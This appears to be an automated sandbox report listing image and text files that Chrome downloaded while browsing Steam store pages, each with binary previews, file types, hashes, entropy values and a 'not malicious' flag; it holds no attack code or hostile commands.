        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................;.........................!.1AQ..q."2a..#3B.....4$rDR....................................%......................!.1.A.Q"B..2q............?..".4).,qL.;.b.+...G.VX2.).~..k.,..X..8d..Q"....$hSC...m....DS.....o.R..b....qT...yFU..=]:...#U...o.[...#.J.J...rI....B..mk.......Q.Im.!(ri.......t...PR.T.p..%m...X.;a..........pe}6.A=z.dr..F.........=.s*.7]....[V..T.r..)%edYb%4...!..w'.b,n.._.k.-'.S.....=3I[QA?...."..YT.m..o.|'.+H)..D.j......9.}jZ..}'R.~...'4.HP..sJ..YX..c.. .....)...6.TS..,0...HN..lUk.....M.o...$&...C.+#i....o~.\....tzHbSgT..T....%...R.<.......-...\r..........v..W.GQ.....c .....7.+^.I...|.........1..&...\"x..I/......+.D..Ve..yPAX.......Z..0.E..+......Gp..v.\..L..h..C>eU+.........RHF.X.xj.......p...`p.T+....+.h......a..z\r.....G*...W
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:downloaded
        Size (bytes):44966
        Entropy (8bit):7.97234887919766
        Encrypted:false
        SSDEEP:768:9aQRa34d3bTMo2EtvSXuuf3jtZLBSZ1koO72vQq7F/kvCy0xtR8KWxuFX+UIG5lT:tR7d3vJDqXuu39SZ6Nq7Rk90x3rWA5lF
        MD5:EE79A6A28F09CD4792EA898BC9250AE1
        SHA1:3D50B12F6510AE3CF6C8352F4823DDE21FFDA69B
        SHA-256:809B65B6946CDDA816F6CC1D72E5A32E8BDD454EE9BEC5C31658F2EDE2D9A7C6
        SHA-512:8DBBFC4A0961CD023FA5975CCA812FDD5062EC200EB43A125BA5CA05C6D756CC466CE91AA2C401B60E1845481C0C24128F61EBA9A0864EE157D737F198294CBE
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2186680/header.jpg?t=1716547508
        Preview:......JFIF.............C....................................................................C......................................................................................................................W..........................!..1A."Qa.2q#B...R.....$3br......%57Ctu.Tcs......468Vde......................................K.........................!1AQ.."aq..2.....T.....#BR...45br..$3D.%6CSs................?..44..q..}.5...LjYI....K3$n..d..0@.[P.t."....o .....q..- .4F.V....2.c....t(.0.C."@.._.L*.ya=?.E..6#.....@....El...|DayI...Z.s...S...E.B..J67..,r~.`Q......J.L$.}.....J.q.U7N..J.7B..|.%e.|...7#...)..P:...F.......z.0.O"...[..T...i.u....y......a.J...Q.OC...h.K....O..b(.....e..E..).%ZW4.7}..A..:.b.. aQ.D4T.qoL.Ju.....#ql+...42..9...@Q.@.....q.$8..Z..).....R.E...&......+GW.....z...lQ....|....A6.z.....V.I.}^..}.6.@........I{W.iM.....:.Uu#Z......,.&..*z..G1.@n..z.|x..t.uI...-.zb.*..'..'..*.T4.....1...t.Q.......-........O|N.OGZ..w..QL-...j.`.?S../.g..A..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):67839
        Entropy (8bit):7.980698257786121
        Encrypted:false
        SSDEEP:1536:Iodm4YRVtb0RUgMwY9AIsIrN7NTFAwTUuU0X/szJ9PizDYX4xHB7:IiYRVR0OCY9Ds+7JiwYuUM/c7iz8X4xZ
        MD5:0A92B65486A8BF947B39DC356FF27CAE
        SHA1:84F83D56A5E3896E4EFC30F6D3C29001B182A3F7
        SHA-256:897C25E44AD6AA7E69713F07D253662906F4D3BCD32F5A4097B324D8F7037FBD
        SHA-512:E65CE449C0CE68A598D560CB44FE6012517073321A31B24D42E206201A7281880AB1BC3A25DEDFFA0DCE7806D3C5F8F304BE252DAA9C72ABFAC73369E415502F
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................R.........................!.1.AQ."aq..2....#B..3Rbr....4.$5...6Cstu..c..%&ST.....................................9.......................!1.A."Q.aq..2........#B3R$r..C..............?..g....]S...*.?.V.A...j.L.y...P.~.....J!......E.@l.P....j.,E9..W....bQ.~.... ........q.......R.c.<D..*..,5M..!.....QFi2..1.....W.v#.|."...R.m.C........:T..6..f....x......g..4..\.....w.....;.kt-+A..........K..lh".y...F.@...2...'...I..i6..GT...{.M.).._?..m..U..BY`.%h.lN9a..ri.".....5i7.`G.Ojtg.....o.R.3..{.q..VukR..gL{~....U..B..w..Y#ZM..]ZKp!..`.a..H??.P,i...4.......eeIP..:...jb.JC...Z.U.X...f ....>T...~Q.s*jE...].....vE...J.m.$...U....l.$Res..8....[..%..+..)py.r.<b.I.Z.ym.K....1.K..t}..B....].......K..*..C..y.0r+....9m..(G$w8GS.a.nJ.d2.....+.a..c......>.h..F .|..b..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 176 x 50, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):2584
        Entropy (8bit):7.591818812076699
        Encrypted:false
        SSDEEP:48:4wqQNn2xoJ35l3QWpQSufhbTCFV0Q0jkIPIH+UCKPnaqiLruSd+1w:oY2ml31ZCdqWQMkADnK41d+1w
        MD5:86A9CCC0B872F22006A48BC6C2500F4E
        SHA1:0EDCCF2CBC869816135C6FF4C3EEE0C49D0F41C1
        SHA-256:D8BBE461137D50211568449468A1981EF189248200EADD48C3141A9DF0B8F7FC
        SHA-512:43EBD681FE137718E45153B9CE062CE9426AC57D6CE907BD3B1C7709BF6F6D2AB4B49E22F2DC4F203DEDF860A895A4B58F4A01095E97722CE5F27935038F0B56
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.......2.......Q.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:595356BA543311EAAC5FF1C3D4DCAF18" xmpMM:DocumentID="xmp.did:595356BB543311EAAC5FF1C3D4DCAF18"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:595356B8543311EAAC5FF1C3D4DCAF18" stRef:documentID="xmp.did:595356B9543311EAAC5FF1C3D4DCAF18"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>tU......IDATx..][l.E.....Q(.....11.VTL."....cb.1../.`x.x...&..F}P.....$*........J..5^Z5..@Kc...3...?{f.....%_...f.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 240 x 233, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):116041
        Entropy (8bit):7.990553337700363
        Encrypted:true
        SSDEEP:3072:oQo/ROLbOBSmChro+9jLdMoQVYZtHzW6A:oQo/WASmCrkaHHzWp
        MD5:1AC5564A83F5C231CD6F3C81F6CEAE27
        SHA1:514E4F053F4E612E7D5767C2A25D92BB5140F8D4
        SHA-256:C148E29D4F90D82E058E70BE8E6199AA4F5509F5266972A0F4A5C97A8091D6AA
        SHA-512:97422266DDCA6187507090CEE6DF3467EF03FCCC498E4AE85C13E6284F7CCFC2EF219505EB92736BC9AEEA1395879C9270098AA47246C4243B97E98227D6ED19
        Malicious:false
        Reputation:low
        URL:https://store.steampowered.com/categories/homepageimage/category/horror?cc=us&l=english
        Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............caNv...............<'A......IDATx..i.m.u...t.c.o..U.*.P..0. A..@.....@5...6%Y.hG...h.......O...![V...Ar..H.......B.....g.?.s3.=<P......<..s..k.......g..F......x. _c..0?....#....d.f. ..g-D....(m....C"..!...QH..H@H.*C...h..hL.6......g..D@HP.(...=......O1../z.....p.&....!.1F... .A@z }6bL?.C.......k.........v.....{...=.Y.{.~.z.{_.....~...c.CD.....5..7...q.xx....@ p*..PA.(P.bwi# ...CD".".c......_.s.c$..1.>.x...}.....ky.u^....|.....]V.z.}.~_>x\.r..E~....?..?K..r......\R.%...E.A....|.....@....z.....;...8.....;.....L..m..,G...$.G...D.P.%..{B..!P..[.xg...C@..O@!."..1..s....QYF..v>AvF..B...5.ID ..5..5H.Aj.4...?\._...a1.M]V(.u.;...!.B:f...>....<...9....}..#..3..=..E|....t.;...>.m,..rw.c.r.!..&w.LHg.6.........B*....E."t.$.A..x..w..6.cF...O....g.......[].......A.~......=`.X............o..........WV...,..Cp4V.....'p:.$ .JC.q@..L.D...D...N.s..t.D...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6085
        Entropy (8bit):7.911655083746525
        Encrypted:false
        SSDEEP:96:ZH9sQF0XRFIDkk09MYaJEjcFXUvUo9CN/wHt1JIuVoJXUMWr/:59s00YkvajUcJwtZoEr/
        MD5:74DDDF95662C80BBA5D98F2FC52EF1B1
        SHA1:627B1AEDB14C1C395D0F8942D67AF85A47B6B5F0
        SHA-256:EF3474B02CECBCEAA93CD6CC5FB8A2E11DF93B3D5D4F5C993F2894705E81F84B
        SHA-512:43D9E3D55CAA9DEF93E3CF981C8E0D1E44C1AFE1F959FD028A8EAD1BC4B890A03603C29EB0444F075E510D5788633B7D593BA2C3CF0056C34624D12211EC6B68
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@...........................!1.A."Qa.2q....#$R.....3Bb...6c...................................2........................!1.Q..."2AR.Baq..#3..S..............?..w{\.{..qQK..(..`...I........ ..p.B.$.uw...@.|...s.....IV......\..=..AAI$.v....|. ......g_Q.y...yRCI.{Q...v*&..L..Bx..*1..].7'[.....7.5[...8A..K......d7Uya.l..hZ......"eQI,F....i[...M..qq.[I$_....W.$.n.w.:..I........:.7.}...F..|...{aP......w>.)..M.Y,.9.9.r!.}....!..o..o...5..MBn.5.9Mn.3.....O...j!..,..z....\_.8.....N..~&.............U...s.6..p7.P..H..T.c)....j>Z.b`.H)u'.t......Yc.*pv.....]......r.=.{...6..m.H.j&!N$jp.J.P..........b....s.63&G....)Y....MX.B...:.!....+@(..W..OjJ.tw..._.S_.M......'{...........K..^tJ)......N....bL...,8M..(N.)D.ok.}....JK._m....Z...v...?....@.....)_..}g.1T.......S-.6.a"
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):15887
        Entropy (8bit):1.9415935019028925
        Encrypted:false
        SSDEEP:48:V/6uSN+k29W8sEvUxN+Y9rNGcfJdGwW/JtAABCSrMLIqIL8Thsc5b77cspcarVam:VSDskEWRFxNXrNGQvGX8w2sc5TTpcNnm
        MD5:8D6F31CEAD93DDE55C98A27CDA35C2AC
        SHA1:11E506A1FC3E7570CACBCCC985E68AF78097EA3A
        SHA-256:A1A9891CEA6178EB76611D404C623AF7DDD3DA277B66AC31E41D8966F245A539
        SHA-512:A4D4A8C6CF66371D97B8A3A12FA51AB816CE96005F565411C56D857D24591C3046E77042D893D09E2FA503BF6CD9FE5F013A64B5D2126A7775EA3A6E26263D18
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................pHYs...............<}iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2016-02-16T16:27:44-08:00</xmp:CreateDate>. <xmp:ModifyDate>2016-03-30T17:37:07-07:00</xmp:ModifyDate>. <xmp:M
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):10651
        Entropy (8bit):7.957800355151082
        Encrypted:false
        SSDEEP:192:azRIHT0kPRtokoPxBs6UJZYhSF6+fyudAMOsZrf5CmZTAZ4:+i7atx3qyhE6+6udrZ702p
        MD5:ADC395485E6506711135DC87837A2401
        SHA1:A387839F55F31F8595F3E8BE97F3C20CC28873D9
        SHA-256:CCDF0552B11795678395688D319E9BBEB6F28A708613D72EE180D40EB27DFB38
        SHA-512:CEBF281D7E9F967E9C43370D3A8B64728D516EB353473FC2A5AADC327FD453A712D10091C9BAF2EF87780DD16AFF9949C54475FCEFE7C796391C3626C1F8AE15
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................N.........................a...!1A.."Qq2...#BR...b....$%35ETUdrt...67s..........................................<.........................!.1AQaq......."2..$3...BRSr..%4Cb............?..^.d-.c.n.e#\.t..S#.7A..5..hvS5.7C....]..{.......~.e..v..v[...]..[....RH..]..|..At;)r....R.7..4[)r....l..K....K....e.Rj.=..I."i6Y.MX.&.\....l....t.-r.T?I..)5B.6Z....M.yB...e.!..&..C!.M.Z...M.....e..)...E..F4.(..A.I......vPd..4.(..,.o.$..|.M......"h6DF.A....9.A..#..h6DH.h7A..D^At*[.y.....]..[...........7.....h..l).7..4[).$....MI.r..dE...4{)r..".<z)r.V.....Y.I..@....,...]&.\.....k.*..N..\.T?I.....A.yb....bE.l..fE...fP.=....G......&.e..)"ivPh*.&.e....]..U.:]..^.M.l*...."m.".E..o...y..~..hE..".=..C.DTE.....". .... ...l....~.e-.v.....6...l....n.dT...t[).6....".k!.E.".k!.Q..9.G..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):2962
        Entropy (8bit):7.8107680482794315
        Encrypted:false
        SSDEEP:48:vllW/ynxidcUQWJW5HmwbBbDedFksoxUIAA17tm82IeiX39kDAjx9+2qYvC:vTW60dlNW5HpD6H/A6IldkDwJrC
        MD5:77F7A41B5E97E609775CEBA470A131FA
        SHA1:AD124121B7AC5A855FBC6F00D0C06126B65A8D73
        SHA-256:C08D51CEEEB0FCD12881CE819C6F940CE4910AC56C347E9482EE1DBDF28C3E54
        SHA-512:F421AC3EDD403EC6B08C37F1DCA06B57F7A2C0BD4BF99F74331D27848AA650B258508AF849E98699775D50BB861183E64925BCADDFEF2BC416C8D32A798A9FF1
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_17dc0cb6604860d9851830c100429b38335ed5d3.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................?.........................!..1A"2Q..aq.3B.....45R..#Dr.bst..................................&.....................!1.A.Q"a.2.qB..............?..SQ<R.c.l.........6.v...$.qC.q..+....iY6}.%WI.67.N....0BWH'.........R..k.........u.WC+Y.U.f`..,h..N.hP..w.cD"..P......%..WK...T.Z.Xb.SWI.5..&.3........qT#......h.Fkt...z.f.....8..+D.8dW....4.xc.i.v..b...........[.....$U....o....UIfclCC..M..1.@....{.-...Z....f@-...1:x..8....y6.^.v...9..k3X*i'.[.b6v]..o~......).DFU...cD..[QH!.....b.D"....(..1h..P.A"..;a....._.....M .j.P.m:....&j9.x.4.Z.r..ElIx....Z.......p...^S....7.:.Q..SJ..f.......t.N..dT..o.r...h.l.SQ.V!x..h..J...2.A....z..G.....8..&....6X..5.....:A....Uu.RZ..V5...._....i-2.7*...;......r(.c.....!...,.E.*.}?en.t:...l\.....(......hYK.\/.........k.uq...x[.5?.QH..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):2213
        Entropy (8bit):7.7266121754497386
        Encrypted:false
        SSDEEP:48:vcGVkMDZ0sG7WhI1kgIAmZgq4alYhDpgeDsl:vcPYNkfxmqguc
        MD5:5940289CF8566F48AF2A0AC6EDE5E80C
        SHA1:27E621BE456AA213469C909E5B63B976FE6BC834
        SHA-256:8AE51EE090A52AE5B3A5BD8AF48958121F09D554263EDA99F4D9D6C638FDEE02
        SHA-512:61F57E2E245E685FCE88095A0648408FFB1FACAE84574FACAFAA40FCE182851A3527972320130401DDC972A70C70D7DC485442F67AACBEC31BF75192CBDC6F99
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................8........................!..1A.Qa."q....#B..2Rr...345................................ .....................!1..AQ2.a............?..o..cP...}E."..&,.....[#%.7e`C..4..<.s.Q.).M$:....=.I..''.&.I....tP:.0.......G...=.b..I...2].)\.=..}.t.+...<;.Q....(d...r.t.|..y...1w..;.b..M......a.I.>"....p.<...i..+...XX....4..3.?.@h.- p.R..@.]...j....`.K.f.P....X..Zu....M.F#...6..S......c;.L$...L.R7..a0i.......)p...7..+f%>...B{w/.>=] .mo....C%..,...@.UN...t.\.Y..V3..Y....X}..6.W.h..QB.!.r........NsO.9.-.Q......($....=..V.G.;kl`....i.$......N.<A..S4~N.h.......m....byB.lt...Q`.\A...e..s+.`;..F3T.w..1...!....A..G#qE...Z]/.....Z9.b....S...Y7.U...;)....U..l.d.F8......5...?..ic.)...I.ItX$aq..1',zl..d...FZ...-e...I/Lhd).m.1.........5."..Y...".r.J....}*p.c.Ym.....,p...;.b..+Y.j.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):20501
        Entropy (8bit):7.961211242674229
        Encrypted:false
        SSDEEP:384:fqUNJkz58TQGWKxI73FBkZDEHIZZRI3c73RBmUW8GiYv35EGayu7loAyMb:7NJkzlxRBksIRI3c73RBE8GBvGGg7lq+
        MD5:6E078767201EC87C7FB3C53772DA6925
        SHA1:F9A1EC97C0D4F16F23C5CE4A572922661BE896F7
        SHA-256:88E10412739146DACB1CC26A0FBE7B95DA3880769B7C58AF75291DADE84272C5
        SHA-512:D95B4FFE7587936425DC458E94CFD2106DE1B03D9E033D91EF9AD93E17265CEDB4A6AD26FF4E127AE6795B3FB0AA72BA82F22472B1F691E25AC73A7F470861FE
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................@..........................!..1A."Qa.q...#2B...$3R....Cbr....c.................................9........................!1AQ.."aq......#2B...$3b.%4r.............?...4.FS...%HJ...[z.......:.....~..K.........H.;t.-x.KI.#*,..5b.F.c.........@R..eJ6I..Ea....v..k.m.).).:..a...W.JM4....b>...@.....a.. ....!y..f..EiI...|..}.r8.Q..dp4...m.....(=..V..*.3/b............`G5TV......c_...[.....8ZB..ll0P^w.-..v....dXa....At.Bn.m....&81.B...w......?.m..EA".!.....^.TA.........Q.[*.M7e&:.........!B]U.l..........*K.Q..._.YJ)t}!d.....P....n}0`.%...J~^. .........0...>...s."..#........xy.!.).. R ..j...|. ..rJ..|p.... ....hI:... . P..\...hV.....:<.a..3.....t...*.....#H.T..L..b[..Y.w.....8..p+...)aj:.N..(.....h.Q_$.....aB...H.^..N...9I....'...2.b._....Ij!JlF9.e.w...Y
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
        Category:downloaded
        Size (bytes):38554
        Entropy (8bit):7.281917544628079
        Encrypted:false
        SSDEEP:768:PcaDYrV5KBau+3erpKn9jpe7z9mWAFjQcR4D9DQ0LKfjLh:PcsiV5Y+erc9T/H4f0jLh
        MD5:231913FDEBABCBE65F4B0052372BDE56
        SHA1:553909D080E4F210B64DC73292F3A111D5A0781F
        SHA-256:9F890A9DEBCDFCCC339149A7943BE9AFF9E4C9203C2FA37D5671A5B2C88503AD
        SHA-512:7B11B709968C5A52B9B60189FB534F5DF56912417243820E9D1C00C97F4BD6D0835F2CDF574D0C36ECB32DBBF5FC397324DF54F7FDF9E1B062B5DBDA2C02E919
        Malicious:false
        Reputation:low
        URL:https://steamcommunity.com/favicon.ico
        Preview:............ .h...V......... ......... .... .....F...00.... ..%............ ..R...D..(....... ..... ..................................u...t...w.H.z...|..}...}...|..z...w.I.t...u...........p...f...e...j...k..k...l...m...n...n...n...m..j...e...f...q...Z...Y...]..._...w6...T..{;..`..._..._..._..._..._...]...Y...Z..~K...P...O...{I............P..R...S...S...S...S...S...R..~K..t@.I.Q!.{T.....................M..zF..{H..{H..{H..{H..zG..yE.I..................................zJ$.m9..o;..o<..p<..p<..o;.........................................eM.p@$.c0..d0..d1..d1..............xP<.g9#..hW..........................~o.],..Z(..Z)...j].a7$.P ..O...P ..O.....v..........................dV.O...Q"..F...H...I...I...I...H...Q&...........................H...I...C...C...C...C...C...C...@....rg.......................C...C...?..I>...>...>...>...>...=...Y:*.....................x^Q.<...?..I=...:...:...:...:...:...:...9...mUG.............ti.=...:...=...7...7...6...6...6...6...6...6...4...@%..R:
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:downloaded
        Size (bytes):7310961
        Entropy (8bit):7.886455356590644
        Encrypted:false
        SSDEEP:98304:xMtw0PvvrFsekpuqnmuUecSgY6MY0V64XaG1TwFFpZJjKc:30/raekpHnmMcC6OXauWXjR
        MD5:1174F706E050E6ACF2EC51F4CF74E276
        SHA1:80F55E559F6256779AA57C8858AE58066288907E
        SHA-256:BE6C6021C0C31B0CE1877DF03F2E68A0C471DA1A273EB8358E72B051CD05C8B1
        SHA-512:F9D9F6EAEFD30E7A97CD9035DB556A4C991C273CCD3BFC7881F8DC03D25AE5F7ECB4D9FA34D19802FE1019E3DD6A77C586418E43E9223BD4B9E6F143B0CE6433
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S.T.A.L.K.E.R.2_bloodsucker.gif?t=1705420866
        Preview:GIF89aj.\...1.............................................................................................................................................#..#..$..$..$..$..$..%..%..%..%..%..%..&..&..&..'..(..)..*..*..*...#./../../..0..0..0..0..0..0..0&.1..1..3..3#.4$.7".7&.8..8..8..8..8..8..9..9..9#.9#.9).:*.;..<'.<(.?..?..?..?..A".A+.B$.C%.C).D..D+.D0.E..F6.G,.G2.H..J#.J(.J6.K8.L..N,.N9.P4.Q%.Q;.R..S;.T9.TA.V).W-.W-.W2.X%.X8.X?.[:.[C.\D._B._J.a).aC!b..f4.f6.gG.i..iN.iO#k?.lQ&mT+o0.q7.rH.v/.w@.x9.xE.yS%z7.{_,~=.~E..Z(.f1.B..9..>..b..J..P..R..n7.G..C..N..c..c+.vD.F..M..p5.S..y;.Q...J.P..c..W..W...L.a..`..X.._..g..p..k...O.d...X.m...e.z..m....m..o..{..k....{..|.k.S.....o.....................#........{.......0..G..P....d.......$..4..M..j..............!..NETSCAPE2.0.....!.......,....j.\...............................................................................................................................................#..#..$..$..$..$..$..%..%..%..%..%..%..&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):8856
        Entropy (8bit):7.942818324768091
        Encrypted:false
        SSDEEP:192:4viBHqIPU09TO+yS75NlOgTnYC5kd2Axi72Yi/2pNLksphNj:eiHzUu1yS75nYC5w2AxI2YiWSsph1
        MD5:B558978285A43C4FCE2E9852A16DBA76
        SHA1:F7E08B2DBC20C9F8044F2A1AD6D7F4ACFE129B6B
        SHA-256:A1A1E7CE6BCB28E82BC5E365CCF4AC3F83600C38B636736ACFB64B5215A91C8D
        SHA-512:8FFFBA5B11D26B0029512012CF58781FF3D5277DEF7441D3E9EFC4E3054B35B4F8EE465DC975B217400765788B5CE9BDE931388DDCC50B8B83F0BA89964802ED
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................X...........................!.1..AQ"a2q.....#B..$&RV.......3c....%467CFSTbdrsu.........................................C......................!..1.AQ.."aq..2r.........CDRT.....5BS#$b..%............?....Y./.ve..1......bc.@..X*........W..Ml.V...A....I..|.Z.....5....m_....>.......8.V..m.]...E...:...xy...9......I.S..m....E.../.........g.lY.<..V.Q.}..6..........EO...._.i.2.......;_..S..g.(.%..s......s.......s.....4. . 5.>.G.$..o.[......cc~...~........k.)..mT...}.1U.z..K.q.v.-.&-u...p'.o........Ll...o..d.b....b...5!..J...B..w.....$.k.....$]e.6...QuZxF.......H.cI=KIN.mv....QM@.......,..Wn=.^g..^I..O`q.......$ ..W.(+...4!.....y..w^..Vw...oo\Z.D.+}.....1..-..kyPL...qI[.....&.G|....3....){......U.....A.l../..;.X?.y.U..z..6..}B.......E....'.........w.-.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:downloaded
        Size (bytes):40
        Entropy (8bit):4.284183719779189
        Encrypted:false
        SSDEEP:3:tXMlSNDrPUbql:t8lSBjUbql
        MD5:89A022138DAA614E95AD7A3B9AE198C9
        SHA1:7D91DA531C71F444BE043BB095B3C9FE45D36BD6
        SHA-256:D1A7039F33569760901D2298295A6EDE0841EF03BF01C080B407941004DAA915
        SHA-512:D7A228A873307228BCB7C48C96016A390A54961322D9A68DE2C8142BD4D208C47C39BA24EF202AB367E86B6F6BF1B2E537840C3A295DA5EFD94DAF3880183BE0
        Malicious:false
        Reputation:low
        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmpxiXbITt9jxIFDZFhlU4SBQ01hlQc?alt=proto
        Preview:ChwKDQ2RYZVOGgQIVhgCIAEKCw01hlQcGgQISxgC
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 71x71, segment length 16, baseline, precision 8, 600x337, components 3
        Category:downloaded
        Size (bytes):38538
        Entropy (8bit):7.974154189712044
        Encrypted:false
        SSDEEP:768:JSAeyUJKGKD9aW1anoJnQXjBErr5U+d9uqLT1NBiQ0j5bT:kAeyUJKGyaW1aUQXtEh9uKLYQ05bT
        MD5:9E71331B2B35139126F2468F40D738C0
        SHA1:9CE18D3CEFC6AB81C5BB54207E9828A64DA70B67
        SHA-256:6D51F18F00AD2CA2E64BA875C45CD976D4C1E2402B24DAF85B1597EFB94DB4EA
        SHA-512:C50CA94BF02A1415FC8ED0C715D317BDB753EB95FD79CBD2E62200EC1DEB9EEDDB82D37D3A230180679B7F2238379857012E7E4A954481607D3C2A5667DC2BAC
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/236390/ss_15343f845523e07d5fc51c6208f362b7bcaa1fbe.600x338.jpg
        Preview:......JFIF.....G.G.....C....................................................................C.......................................................................Q.X..".........................................K........................!..1A."Qa.2q....#BR....3br..$C.......4Sc..%D5Ts..................................5.......................!1.A.Qa."2q.......#BR...3.$r............?....RI..Gle.yH...-.._.QDf...s.O...........5\..A.?..c.P6.T.......@.W .$g.Ms.....s.{.E.P...S@.*@....s.......9...zS....2.....@.W.nv.tO...X.t...<.c..0.v..@...0O.5|.Q........@.|...@...:Ug......}MH.....#E......Q........%b....I_....q..oL{S#A..=(.&.].M,..;T.}.......`.:G..I.EI3..!. ...(.1....c.L.......5..?......5..G.b.J:..Ph...t.;..EW...b..9.t.\......%..+....zF)..f....d..+Q.lRi(8.......L$.. ........z2I.IE/Pw...w..Hmd.,....^.1.&(.(;.Q^..*&....z..g8...........,Fz..qL..U....j...L.@.G._ ..J.P*.....C.>...x..D...?4M..-..U.w...IS#..4~+..bQ.....=.2.3....q....]..lZ'.\..c$=.c.........'..@.n....[j.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3832
        Entropy (8bit):7.879119679233873
        Encrypted:false
        SSDEEP:96:vnLtTez+0jB6dHa0M6tse0BG9gtma8X6cf026uqKpY:fpTe/p6rWG9gtmodk2
        MD5:35E0FA2D052DCD95A8C069E24053105A
        SHA1:238C422C5E5F17066B129BBFD5DCA07A0B669C21
        SHA-256:2DFE0D7F540BBCFFFB3FB0607C426210FDFFBC4DD76139E73DA1399584854630
        SHA-512:154127FB47A0741994921BABF6151B9586AF551BD8AC7D445C6FB90B2F533553711420206FB7738817C9A5DE64155159A707BB0D4DD7A2F6871E5246493EB7ED
